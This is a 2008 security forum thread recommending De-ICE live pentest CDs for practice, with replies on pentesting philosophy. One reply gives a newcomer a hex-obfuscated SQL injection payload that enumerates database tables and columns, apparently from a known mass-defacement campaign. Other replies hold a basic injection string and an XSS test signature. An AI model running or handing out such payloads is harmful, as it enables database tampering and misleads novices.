Home
Calendar
Certifications
Columns
Features
Forum
Resources
Vitals
Latest Additions
Jan 2009 Free Giveaway Sponsor - Black Hat DC
Scooby Doo and the Crypto Caper - Answers and Winners
Daemon - A Contest Revealed
Hacking: The Art of Exploitation 2nd Edition
Nov 2008 Free Giveaway - Winners
Dec 2008 Free Giveaway Sponsor - SANS
Santa Claus is Hacking to Town
Plug-N-Play Network Hacking
Nov 2008 Free Giveaway Sponsor - CWNP
Daemon - A Contest Begins Now
It Happened One Friday - Answers and Winners
Daemon - A Contest
Scooby Doo and the Crypto Caper
MS Blue Hat Hackers Headline Chicago Security Con
The Pen Testing Perfect Storm Webcast Series with Skoudis, Wright, Johnson
EH-Net Login
Welcome Guest.
Username:
Password:
Remember me
Lost Password?
No account yet?
Register
Who's Online
We have 26 guests and 1 member online
EH-Net Donations
Enter Amount:
$
CAD
USD
GBP
AUD
JPY
EUR
Google Ads
EH-Net News Feeds
Latest Additions
Book Recommendations
You are here:
Home
Forum
Ethical Hacking Discussions and Related Certifications
Network Pen Testing
So you want to learn hacking?
Ethical Hacker Community Forums
January 08, 2009, 07:23:03 PM
Welcome,
Guest
. Please
login
or
register
.
Did you miss your
activation email?
1 Hour
1 Day
1 Week
1 Month
Forever
Login with username, password and session length
News
: ChicagoCon 2009 - May 4 - 9. Boot Camps & an Ethical Hacking Conf.
www.chicagocon.com
Home
Help
Calendar
Login
Register
Ethical Hacker Community Forums
>
Ethical Hacking Discussions and Related Certifications
>
Network Pen Testing
(Moderator:
don
) >
So you want to learn hacking?
Pages: [
1
]
Go Down
« previous
next »
Print
Author
Topic: So you want to learn hacking? (Read 5141 times)
0 Members and 1 Guest are viewing this topic.
Kev
Sr. Member
Offline
Posts: 359
So you want to learn hacking?
«
on:
August 01, 2008, 11:34:59 AM »
I made a post earlier about my concerns about people assuming hacking is limited mostly to exploiting software. The founder of the Metasploit project himself made it clear at the last Blackhat conference that “hacking is not about exploits. As many professional auditors know, only one or two real exploits may be used during a penetration test.” He mentioned that most of the time you are cracking passwords, exploiting trust relationships, etc…
At that same conference, the opening speaker, Richard Clarke (former chief counter-terrorism adviser to the US National Security Council) seemed to think completely opposite of that perception. He seemed to feel if we could get coders to write more secure software all would be right in the world.
What concerns me is if someone new to security simply downloads a copy of Backtrack and runs autopwn on their network and doesn’t get a shell, now feels his network must be secure. This couldn’t be further from the truth.
There is a site I have started to recommend to those new to security. Most of us know about it, but I am not sure how many have actually gone there and downloaded the live CDs and hacked them. I am referring to the DE-ICE.net live pentest cds.
This is such a great concept and I really support it for training those new to the field. Now I have only downloaded the first 2 and I will say any seasoned hacker can get through them quickly, but what I like is you can’t exploit them to get root with metasploit. You have to think like a hacker.
My understanding is the scenarios were created from “real life” pentests the author of these Cds Tom Wilhelm encountered in the field. The entire concept of live pentest CDs has so much merit. You can easily boot them up and hack away. If you screw things up, just reboot. The very best thing about this project is there is a challenge involved. That has always been the weak part of a home lab. Now I am a big supporter of having a lab and have made a number of posts here about doing that. But the one weak aspect is you already know if it’s vulnerable or not when you set it up. Well, unless you are into exploit research, but most CEHs are not doing that and are simply practicing with their tools. Being great with tools is fine, but it doesn’t teach you how solve puzzles and that’s what hacking is all about. A live pentest CD on the other hand presents a puzzle for you try and figure out. It teaches you how to “think” like a hacker and how to solve puzzles. This is in my opinion the most crucial quality to gain and I really don’t care how well you know all the switches of nmap or you know metasploit top to bottom, etc…
Yes, like anything there are some short coming and live cds are not perfect. They don’t give the feel of a networked environment. However you could rewrite them to be if you wished, but thats not really what they are all about any way. There are not many available so far and of course they are all presented in linux so you wont be hacking server 2003, but once you have the concepts down you could easily apply the concepts to any OS.
If you do decide to take a stab at the CDs , please resist the temptation to looks at the spoilers out there. There are even full video spoilers available, but this would make as much sense as going to an answer page of a crossword puzzle before you even try and filling in all the blanks! I doubt that will make you a better crossword player. Just to say again, the value is not that you are going to learn some new amazing hacking technique, but that you can learn to solve puzzles and think like a hacker.
From what I gather, this is the same attribute that Muts is trying to instill in his course and if you are going after that certification, before you take the test it might benefit you to run through these Cds. I really can only say good things about the concept and I hope one day it will be expanded to include every level of challenge.
http://de-ice.net/index.php?name=News&file=article&sid=1
«
Last Edit: August 01, 2008, 11:45:15 AM by Kev
»
Logged
oleDB
Full Member
Offline
Posts: 231
Re: So you want to learn hacking?
«
Reply #1 on:
August 01, 2008, 01:59:19 PM »
Great Post. Thats a cools site, thanks for the link.
I would have to describe the difference in philosophy of HD and the General as one who thinks about design security vs. implementation security. Its kind of a lame analogy, but follow me on this. HD or any other pen tester out there, is primarily involved down in the weeds doing actual red team work. They are the ones exposed to the actual implementation, and constantly see that its not some elite exploit that gets them in, but careless mistakes or just plain dumb implementations. Now consider the same instance from the General's view point. He is a high level guy. His guys tell him everything is patched, so the only way some is breaching his network is via an unknown exploit, as far as he is concerned. So you see the difference between the real world on the front lines, and the high level check-box mentality.
Logged
RoleReversal
Hero Member
Offline
Posts: 508
Re: So you want to learn hacking?
«
Reply #2 on:
August 02, 2008, 02:49:22 AM »
Kev,
great post, I've played with the De-ICE tools in the past have had some success and fun. From a learning perspective there are few things better than being thrown in at the deep-end to put the theory into practice.
Logged
A little bit of sanity:
http://www.infosanity.co.uk
cleanwithit0607
Newbie
Offline
Posts: 43
Re: So you want to learn hacking?
«
Reply #3 on:
August 03, 2008, 08:30:32 AM »
Dang, Kev. Thanks for making this post. I had never heard of De-Ice.net. This should help me alot before I take the OSCP. I trust anything you say Kev.
Logged
A+, Network +, Security +, Linux +
Work in progress: CEH
Currently Reading: Hacking-The Art Of Exploitation.
Recommended book: Counter Hack Reloaded.
dalepearson
Full Member
Offline
Posts: 163
Re: So you want to learn hacking?
«
Reply #4 on:
August 04, 2008, 04:40:50 PM »
Kev,
great post and I will have a look at this.
Are you aware of any other similar projects?
There used to be similar versions for forensic training, but due to the time required to build an image for testing forensic skills these have almost deminished, but anything like this for training purposes are excellent.
Logged
:: Security Active ::
RobMongoose
Newbie
Offline
Posts: 28
Re: So you want to learn hacking?
«
Reply #5 on:
August 04, 2008, 07:55:32 PM »
I'd not heard of this so thanks for posting. I'll have to give these a go.
Something to do with the time I have on my hands before I start back at uni anyway...
Logged
Mutterings of an evil genius in training -
http://robmongoose.blogspot.com/
Kev
Sr. Member
Offline
Posts: 359
Re: So you want to learn hacking?
«
Reply #6 on:
August 06, 2008, 01:11:25 PM »
Thanks for the comments everyone. I am hoping when I have a little extra time to create a few live CDs to help contribute to the concept. Certainly one of these should be for forensic analysis as well some others for several levels of penetration difficulty. Hopefully others out there will also be inspired to help this project.
«
Last Edit: August 06, 2008, 01:12:56 PM by Kev
»
Logged
bruha666v
Newbie
Offline
Posts: 7
Re: So you want to learn hacking?
«
Reply #7 on:
August 10, 2008, 02:19:31 AM »
hey guys!
im Bruha666v from the philippines...I've recently learned about SQL injection.
Well, its really cool coz u get to inject some codes on vulnerable sites.Well, do u guys haev any suggestions on how to start with SQL injection???
Please help me out guys...
THanks
Bruha666c
Logged
RoleReversal
Hero Member
Offline
Posts: 508
Re: So you want to learn hacking?
«
Reply #8 on:
August 10, 2008, 03:09:32 AM »
Quote from: bruha666v on August 10, 2008, 02:19:31 AM
Well, its really cool coz u get to inject some codes on vulnerable sites.Well, do u guys haev any suggestions on how to start with SQL injection???
Bruha666v,
try
google
and
'--
for starters.
I also saw a new web application testing book (can't remember the title) that contains example web pages that can be used as practice targets. Could be worth a look, it's on my reading list (as soon as I remember the name....)
Logged
A little bit of sanity:
http://www.infosanity.co.uk
Grendel
Newbie
Offline
Posts: 10
Re: So you want to learn hacking?
«
Reply #9 on:
August 28, 2008, 10:01:43 AM »
Kev -
I'm the guy behind the de-ice.net pentest disks, and wanted to thank you for the well-written post and kudos. It's good to see some people are starting to realize pentesting is so much more than simple vulnerability tests; but obviously there is a lot more work that needs to be done to educate the masses (especially those with a "C" in front of their title or a lot of metal on their shoulders).
I caught that you tried the first two disks, and will agree with you that they can be plowed through pretty quickly by any seasoned pro. However, you should give the lvl 2 disk a shot - quite a bit more difficult.
We do have a lvl 3 disk in development, but again it will not include known exploits (serious emphasis on "known"). That should be out right around the holiday season (we all need a distraction around that time of year, especially when in-laws are in town, eh?).
Again, thanks for the kudos, and please don't hesitate to contact me with any suggestions / comments / war stories.
- Tom W.
Logged
ISSMP CISSP SCSECA SCNA SCSA IAM MSCS MSM
dean
Full Member
Offline
Posts: 130
Re: So you want to learn hacking?
«
Reply #10 on:
August 28, 2008, 12:07:30 PM »
bruha666v,
try this:
Code:
;DECLARE @S CHAR(4000);SET @S=CAST(0x4445434c415245204054207661726368617228323535292c40432076617263686172283430303029204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420612e6e616d652c622e6e616d652066726f6d207379736f626a6563747320612c737973636f6c756d6e73206220776865726520612e69643d622e696420616e6420612e78747970653d27752720616e642028622e78747970653d3939206f7220622e78747970653d333520AS CHAR(4000));EXEC(@S);
you might want to decode the hex before running it though.
Logged
<script>alert('%52%54%46%4D')</script>
Kev
Sr. Member
Offline
Posts: 359
Re: So you want to learn hacking?
«
Reply #11 on:
August 28, 2008, 12:26:52 PM »
Hey Grendel,
Yes, as soon as I have a little extra time I will check out the next disks and report back. I really support your efforts in this direction and thanks for finding your way to our forum.
Logged
don
Editor-In-Chief
Administrator
Hero Member
Offline
Posts: 2435
Editor-In-Chief
Re: So you want to learn hacking?
«
Reply #12 on:
August 28, 2008, 02:34:52 PM »
Welcome Grendel,
Thanks for reaching out and giving Kev a pat on the back. He does good work and deserves recognition. Please let us know when the next one is ready, and we will be sure to plug it.
Looking forward to seeing more of you on EH-Net?
All the best,
Don
Logged
CISSP, MCSE, CEH, Security+ SME
Grendel
Newbie
Offline
Posts: 10
Re: So you want to learn hacking?
«
Reply #13 on:
August 28, 2008, 06:22:50 PM »
Quote from: don on August 28, 2008, 02:34:52 PM
Welcome Grendel,
Thanks for reaching out and giving Kev a pat on the back. He does good work and deserves recognition. Please let us know when the next one is ready, and we will be sure to plug it.
Looking forward to seeing more of you on EH-Net?
All the best,
Don
Strange that I haven't bumped into this site before - Kev's post hit google, which is how I found it. I'll definitely be around, and will certainly keep everyone up on the latest pentest livecd releases.
- Tom W.
Logged
ISSMP CISSP SCSECA SCNA SCSA IAM MSCS MSM
ChrisG
EH-Net Columnist
Hero Member
Offline
Posts: 1049
Re: So you want to learn hacking?
«
Reply #14 on:
August 28, 2008, 10:26:31 PM »
so really we just need to randomly but de-ice into threads and we'll get you to show up...
Logged
...tests i took go here...
http://carnal0wnage.blogspot.com/
Pages: [
1
]
Go Up
Print
« previous
next »
Jump to:
Please select a destination:
-----------------------------
EH-Net
-----------------------------
=> Special Events
=> Calendar Of Events
===> ChicagoCon 2007
===> ChicagoCon 2008s
===> ChicagoCon 2008f
===> ChicagoCon 2009
=> News Items and General Discussion About EH-Net
-----------------------------
Ethical Hacking Discussions and Related Certifications
-----------------------------
=> Certification
===> The Charter Study Group - Pen Test
=> Network Pen Testing
===> CEH - Certified Ethical Hacker
=====> CEH - Official Course Modules v4
=====> CEH - Official Course Modules v5
=====> CEH - Official Course Modules v6
===> CPTS - Certified Pen Testing Specialist
=====> CPTS - Official Course Modules v5
===> CPTE - Certified Pen Testing Expert
=====> CPTE - Official Course Modules v1
===> ECSA - EC-Council Certified Security Analyst
=====> ECSA - Official Course Modules v1.2
=====> ECSA / LPT - Official Course Modules v3
===> OSCP - Offensive Security Certified Professional
===> GPEN - GIAC Certified Penetration Tester
=> Forensics
===> CCE / MCCE - (Master) Certified Computer Examiner
===> CHFI - Computer Hacking Forensic Investigator
=====> CHFI - Official Course Modules v2
===> EnCE - EnCase® Certified Examiner
=> Incident Response
===> CSIH - Computer Security Incident Handler
===> GCIH - GIAC Certified Incident Handler
=> Hardware
=> Malware
=> Physical Security
=> Programming
=> Social Engineering
=> Web Applications
=> Wireless
===> CWNP Certs
===> GAWN - GIAC Assessing Wireless Networks
===> OSWP - Offensive Security Wireless Professional
=> Other
-----------------------------
Columns
-----------------------------
=> Editor-In-Chief
=> Gates
=> Heffner
=> Hoffman
=> RichM
=> Murray
=> J. Peltier
=> Wilson
-----------------------------
Features
-----------------------------
=> /root
=> Book Reviews
=> Opinions
=> Skillz
===> Examples
===> May 06 - Star Hacks, Episode V: The Empire Hacks Back
===> July 06 - Hack Bill!
===> Sept 06 - Netcat in the Hat
===> Nov 06 - Hitch-Hackers Guide to the Galaxy
===> Dec 06 - A Christmas (Hacking) Story
===> Feb 07 - Charlottes Web Site
===> April 07 - Microsoft Office Space
===> June 07 - Serenity Hack
===> Oct 07 - Worst. Ethical. Hacker. Challenge. Ever.
===> Dec 07 - Frosty the Snow Crash
===> March 2008 - It Happened One Friday
===> Oct 2008 - Scooby Doo and the Crypto Caper
===> Dec 08 - Santa Claus Is Hacking to Town
-----------------------------
Resources
-----------------------------
=> Career Central
===> Looking For Work
===> Looking To Hire
=> Links to cool sites.
=> Mass Media
=> News from the Outside World
=> Tools
=> Tutorials
Loading...
Sponsors
Polls
How many security events including conferences and training do you attend a year:
1 - 2
3 - 4
5 - 6
7+
None - But want to
None - Choose not to
Support EH-Net
Support EH-Net by
Buying all of your
Amazon items using
the search bar above.
Try CBT Nuggets Free!
Recent Forum Topics
Malware
: uninstall trend mciro officescan clients
(1) by
adamj
Web Applications
: Determine URL from IP address
(1) by
adamj
Book Reviews
: Need a book suggestion!
(3) by
ethicalhack3r
Tools
: Core Impact Essentials
(0) by
sgt_mjc
News from the Outside World
: Google branching out a little further...
(3) by
jason
Physical Security
: Magnetic stripe card spoofing
(5) by
jason
Gates
: Oracle version module for metasploit
(3) by
RoleReversal
Malware
: THe website is Evil but what to do??
(3) by
NickFnord
CEH - Certified Ethical Hacker
: Helow... help some tutorials...
(7) by
K3lV1n
CEH - Certified Ethical Hacker
: CEH is a scam
(20) by
K3lV1n
Mass Media
: Daniel Suarez Interview
(9) by
blackazarro
Malware
: Security Forecast for 2009
(5) by
jason
News from the Outside World
: Is this acceptable?
(9) by
jason
Wireless
: Wireless Pen Testing Cards
(6) by
jason
Oct 2008 - Scooby Doo and the Crypto Caper
: Skillz October 08 Winning Entry - Technical
(1) by
jason
Book Reviews
: [Article]-Mitnick - The Art Of Intrusion: Ch 1 - Hacking The Casinos For A Million Bu...
(5) by
jason
Links to cool sites.
: Free Computer Engineering Classes From Stanford
(3) by
jason
Oct 2008 - Scooby Doo and the Crypto Caper
: Skillz October 08 Winning Entry - Creative
(1) by
jason
Oct 2008 - Scooby Doo and the Crypto Caper
: [Article]-Scooby Doo and the Crypto Caper - Answers and Winners
(2) by
jason
News Items and General Discussion About EH-Net
: [Article]-Jan 2009 Free Giveaway Sponsor - Black Hat DC
(1) by
jason
News Items and General Discussion About EH-Net
: EH-Net Milestone - 2 Articles Cross 1 Million Page Views
(3) by
BillV
Other
: What kind of lab, machines you have for your security testing?
(12) by
charlottebandit
Malware
: Network Virus Problem
(9) by
RoleReversal
Wireless
: WUSB600N good usb ?
(2) by
nap191
Other
: FBI code cracking challenge
(3) by
jimbob
Calendar Of Events
: RSA 2009
(0) by
don
Forensics
: Network Forensic tools/practice/techniques
(2) by
jimbob
Malware
: Autoplay when i try to open the drive.
(4) by
jimbob
Other
: Insanity?
(3) by
jason
CEH - Certified Ethical Hacker
: Any Practice Environment for learning tool for CEH?
(15) by
don
Wireless
: a petri-dish bridge
(2) by
don
CEH - Certified Ethical Hacker
: TFTP Tranfer time out
(5) by
jason
Tools
: tool to trace users
(8) by
pseud0
Malware
: Malware Challenge 2008 Analysis
(0) by
blackazarro
Programming
: Python 3.0 Released
(0) by
don
Forensics
: SANS SIFT Forensic toolkit
(1) by
don
Links to cool sites.
: Omgili Hacking - Another Search Engine dedicated to Hacking Related Forums
(2) by
RoleReversal
Tools
: Insecure.org's 2006 Top 100 Security Tools List Released
(10) by
shednik
Other
: Happy New Year!
(8) by
vijay2
CEH - Official Course Modules v6
: Community-built CEH Wiki
(2) by
yehg
Vote For EH-Net
progenic.com
binarica.com
technorati fave
Privacy Notice
for TDCC & All Properties
© 2009 The Ethical Hacker Network
Joomla!
is Free Software released under the GNU/GPL License.